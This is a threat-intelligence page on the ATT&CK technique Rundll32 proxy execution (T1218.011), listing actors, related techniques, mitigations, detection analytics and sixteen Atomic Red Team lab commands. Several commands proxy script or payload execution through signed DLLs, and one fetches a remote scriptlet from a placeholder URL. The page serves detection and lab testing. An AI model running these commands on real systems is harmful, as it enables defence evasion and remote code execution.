Home/ATT&CK Technique/Rundll32
ATT&CK Technique

Rundll32

T1218.011 · stealth

Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations.

Rundll32.exe is commonly associated with executing DLL payloads (ex: rundll32.exe {DLLname, DLLfunction}). Rundll32.exe can also be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute.

For example, ClickOnce can be proxied through Rundll32.exe. Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")" This behavior has been seen used by malware such as Poweliks.

Threat actors may also abuse legitimate, signed system DLLs (e.g., zipfldr.dll, ieframe.dll) with rundll32.exe to execute malicious programs or scripts indirectly, making their activity appear more legitimate and evading detection. Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command rundll32.exe ExampleDLL.dll, ExampleFunction, rundll32.exe would first attempt to execute ExampleFunctionW, or failing that ExampleFunctionA, before loading ExampleFunction).

Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending W and/or A to harmless ones. DLL functions can also be exported and executed by an ordinal number (ex: rundll32.exe file.dll,#1). Additionally, adversaries may use Masquerading techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.

Windows

Actors Using This

14
iranAgrius
russia_speaking_cybercrimeAkira
russia_speaking_cybercrimeALPHV / BlackCat
latin_america_brazilian_organized_cybercrimeAmavaldo
north_koreaAndariel
chinaAoqin Dragon
chinaAPT10
chinaAPT17
russiaAPT28
russiaAPT29
chinaAPT31
iranAPT33
iranOilRig
iranAPT35

Likely Attack Path

Techniques the same actors pair with this one distinctively - those showing up among actors who use this technique noticeably more than across all actors (lift > 1.15), grouped by kill-chain phase. The × is that lift multiplier; the shared-actor count is in the tooltip. A near-universal technique pairs with everything at baseline, so its list is short by design.
resource-development same
T1588.003 · Code Signing Certificates ×1.38
persistence same
T1547.009 · Shortcut Modification ×1.38
privilege-escalation same
T1055.012 · Process Hollowing ×1.38T1546.001 · Change Default File Association ×1.38T1546.011 · Application Shimming ×1.38T1546.015 · Component Object Model Hijacking ×1.38
discovery same
T1482 · Domain Trust Discovery ×1.38
collection same
T1056.002 · GUI Input Capture ×1.38
impact same
T1529 · System Shutdown/Reboot ×1.38
other same
T1564.003 · Hidden Window ×1.38T1480 · Execution Guardrails ×1.38T1218.010 · Regsvr32 ×1.38T1218.007 · Msiexec ×1.38T1480.001 · Environmental Keying ×1.38T1218.001 · Compiled HTML File ×1.38

Atomic Tests

16
Executable Atomic Red Team test cases for exercising this technique in a lab. Copy a command, run it on the listed platform, confirm your detections fire.
command_promptwindowsRundll32 execute JavaScript Remote Payload With GetObject
Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened. This has been used by Win32/Poweliks malware and works as described [here](https://www.stormshield.com/news/poweliks-command-line-confusion/) Note: The GetObject function is no longer supported in Internet Explorer v9 (2011) and later so this technique would only work where very old versions of IE are installed. 
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();window.close();
command_promptwindowsRundll32 execute VBscript command
Test execution of a command using rundll32.exe and VBscript in a similar manner to the JavaScript test. Technique documented by Hexacorn- http://www.hexacorn.com/blog/2019/10/29/rundll32-with-a-vbscript-protocol/ Upon execution calc.exe will be launched 
rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("#{command_to_execute}"),0)
command_promptwindowsRundll32 execute VBscript command using Ordinal number
Test execution of a command using rundll32.exe and VBscript in a similar manner to the JavaScript test. Technique documented by Hexacorn- http://www.hexacorn.com/blog/2019/10/29/rundll32-with-a-vbscript-protocol/ Upon execution calc.exe will be launched 
rundll32 vbscript:"\..\mshtml,#135 "+String(CreateObject("WScript.Shell").Run("#{command_to_execute}"),0)
command_promptwindowsRundll32 advpack.dll Execution
Test execution of a command using rundll32.exe with advpack.dll. Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Advpack.yml Upon execution calc.exe will be launched 
rundll32.exe advpack.dll,LaunchINFSection "#{inf_to_execute}",DefaultInstall_SingleUser,1,
command_promptwindowsRundll32 ieadvpack.dll Execution
Test execution of a command using rundll32.exe with ieadvpack.dll. Upon execution calc.exe will be launched Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Ieadvpack.yml 
rundll32.exe ieadvpack.dll,LaunchINFSection "#{inf_to_execute}",DefaultInstall_SingleUser,1,
command_promptwindowsRundll32 syssetup.dll Execution
Test execution of a command using rundll32.exe with syssetup.dll. Upon execution, a window saying "installation failed" will be opened Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Syssetup.yml 
rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 "#{inf_to_execute}"
command_promptwindowsRundll32 setupapi.dll Execution
Test execution of a command using rundll32.exe with setupapi.dll. Upon execution, a windows saying "installation failed" will be opened Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Setupapi.yml 
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 "#{inf_to_execute}"
command_promptwindowsExecution of HTA and VBS Files using Rundll32 and URL.dll
IcedID uses this TTP as follows: rundll32.exe url.dll,OpenURL %PUBLIC%\index.hta Trickbot uses this TTP as follows: rundll32.exe URL.dll,FileProtocolHandler C:\\..\\Detail\\akteullen.vbs In this atomic, the sample hta file opens the calculator and the vbs file shows a message dialog with "rundll32 spawned wscript" 
rundll32.exe url.dll,OpenURL "PathToAtomicsFolder\T1218.011\src\index.hta"
rundll32.exe URL.dll,FileProtocolHandler "PathToAtomicsFolder\T1218.011\src\akteullen.vbs"
command_promptwindowsLaunches an executable using Rundll32 and pcwutl.dll
Executes the LaunchApplication function in pcwutl.dll to proxy execution of an executable. 
rundll32.exe pcwutl.dll,LaunchApplication #{exe_to_launch}
powershellwindowsExecution of non-dll using rundll32.exe
Rundll32.exe running non-dll 
rundll32.exe #{input_file}, StartW
command_promptwindowsRundll32 with Ordinal Value
Rundll32.exe loading dll using ordinal value #2 to DLLRegisterServer. Upon successful execution, Calc.exe will spawn. 
rundll32.exe "#{input_file}",#2
command_promptwindowsRundll32 with Control_RunDLL
Rundll32.exe loading dll with 'control_rundll' within the command-line, loading a .cpl or another file type related to CVE-2021-40444. 
rundll32.exe shell32.dll,Control_RunDLL "#{input_file}"
command_promptwindowsRundll32 with desk.cpl
Rundll32.exe loading an executable renamed as .scr using desk.cpl Reference: - [LOLBAS - Libraries/Desk](https://lolbas-project.github.io/lolbas/Libraries/Desk/) SIGMA rules: - [SCR File Write Event](https://github.com/SigmaHQ/sigma/blob/b53f08b081e0a50099be9b9e8eced82097fdbaf2/rules/windows/file_event/file_event_win_new_src_file.yml) - [Rundll32 InstallScreenSaver Execution](https://github.com/SigmaHQ/sigma/blob/b53f08b081e0a50099be9b9e8eced82097fdbaf2/rules/windows/process_creation/proc_creation_win_lolbin_rundll32_installscreensaver.yml) 
copy #{exe_to_launch} not_an_scr.scr
rundll32.exe desk.cpl,InstallScreenSaver not_an_scr.scr
command_promptwindowsRunning DLL with .init extension and function
This test, based on common Gamarue tradecraft, consists of a DLL file with a .init extension being run by rundll32.exe. When this DLL file's 'krnl' function is called, it launches a Windows pop-up. DLL created with the AtomicTestHarnesses Portable Executable Builder script. 
rundll32.exe #{dll_file},krnl
command_promptwindowsRundll32 execute command via FileProtocolHandler
Test execution of a command using rundll32.exe and the FileProtocolHandler technique. Upon execution, calc.exe will be launched. This technique is documented by Levan Abesadze - https://medium.com/@Wolverineisstillalive/system-binary-proxy-execution-rundll32-bypass-method-790871e1f2b7 
rundll32.exe url.dll,FileProtocolHandler #{command_to_execute}
powershellwindowsRundll32 execute payload by calling RouteTheCall
Launch an executable payload by calling RouteTheCall. Test execution of a command using rundll32.exe to execute a payload{calc.exe} by calling RouteTheCall. Upon execution, calc.exe will be launched. Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Zipfldr.yml 
rundll32.exe zipfldr.dll,RouteTheCall "#{exe_to_launch}"

Mitigations

1
MITRE ATT&CK mitigations - vendor-agnostic guidance for reducing exposure to this technique.
M1050Exploit Protection

Deploy capabilities that detect, block, and mitigate conditions indicative of software exploits. These capabilities aim to prevent exploitation by addressing vulnerabilities, monitoring anomalous behaviors, and applying exploit-mitigation techniques to harden systems and software.

Operating System Exploit Protections
  • Use Case: Enable built-in exploit protection features provided by modern operating systems, such as Microsoft's Exploit Protection, which includes techniques like Data Execution Prevention (DEP), Address Space Layout Randomization (ASLR), and Control Flow Guard (CFG).
  • Implementation: Enforce DEP for all programs and enable ASLR to randomize memory addresses used by system and application processes. Windows: Configure Exploit Protection through the Windows Security app or deploy settings via Group Policy. ExploitProtectionExportSettings.exe -path "exploit_settings.xml" Linux: Use Kernel-level hardening features like SELinux, AppArmor, or GRSEC to enforce memory protections and prevent exploits.
Third-Party Endpoint Security
  • Use Case: Use endpoint protection tools with built-in exploit protection, such as enhanced memory protection, behavior monitoring, and real-time exploit detection.
  • Implementation: Deploy tools to detect and block exploitation attempts targeting unpatched software.
Virtual Patching
  • Use Case: Use tools to implement virtual patches that mitigate vulnerabilities in applications or operating systems until official patches are applied.
  • Implementation: Use Intrusion Prevention System (IPS) to block exploitation attempts on known vulnerabilities in outdated applications.
Hardening Application Configurations
  • Use Case: Disable risky application features that can be exploited, such as macros in Microsoft Office or JScript in Internet Explorer.
  • Implementation: Configure Microsoft Office Group Policies to disable execution of macros in downloaded files.

Detection Coverage

2/6 layers
Coverage across standard detection surfaces. Rows marked none have no rule of that type mapped. Some are real blind spots worth closing; others are simply not applicable to this technique (e.g. YARA matches malware files, not network behaviour).
Behavioral / log (Sigma) 27
Analytics (MITRE CAR) 1
Runtime / container (Falco) none
File / malware (YARA) none
Network (Suricata/Snort) none
Vuln scan (Nuclei) none

CAR Analytics

1
MITRE Cyber Analytics Repository - field-tested detection logic for this technique, written as pseudocode/queries you adapt to your own SIEM (Splunk, Sentinel, EQL). Each is a ready starting point for a detection rule, not just a description.
CAR-2014-03-006Moderate coverageRunDLL32.exe monitoring

Adversaries may find it necessary to use Dyanamic-link Libraries (DLLs) to evade defenses. One way these DLLs can be "executed" is through the use of the built-in Windows utility RunDLL32, which allows a user to execute code in a DLL, providing the name and optional arguments to an exported entry point. Windows uses RunDll32 legitimately in its normal operation, but with a proper baseline and understanding of the environment, monitoring its usage could be fruitful.

pseudocode
process = search Process:Create
rundll32 = filter process where (exe == "rundll32.exe")
output rundll32
DNIF
_fetch * from event where $LogName=WINDOWS-SYSMON AND $EventID=1 AND $App=rundll32.exe limit 100
LogPoint
norm_id=WindowsSysmon event_id=1 image="*\rundll32.exe"

Comply & Defend

NIST 800-53CA-07, SI-04, SI-07, SI-10
D3FEND12 defensive techniques
Intelligence Graph · click any node to traverse
CVETechnique ActorTool Family
drag to reposition · click any node to traverse · button top-right enlarges
External lookups - second-class, for what we don’t hold ourselves
MITRE ATT&CKAtomic Red Teamcar (MITRE)
Vulnerabilities
CISA KEV catalog
CWE weaknesses
CAPEC attack patterns
Package vulnerabilities
Threat intelligence
Threat actors
Tools & malware
ATT&CK techniques
IOCs
Detection & defense
Sigma rules
YARA rules
Atomic Red Team tests
D3FEND countermeasures
Compliance
NIST 800-53
ISO 27001:2022
SOC 2 TSC
PCI-DSS v4.0
CIS Controls v8.1
About
All capabilities
Live statistics
Data sources
Privacy policy
Terms of service
threatengine.sh  ·  Open-source threat intelligence platform  ·  100+ authoritative sources  ·  Every fact traces to its origin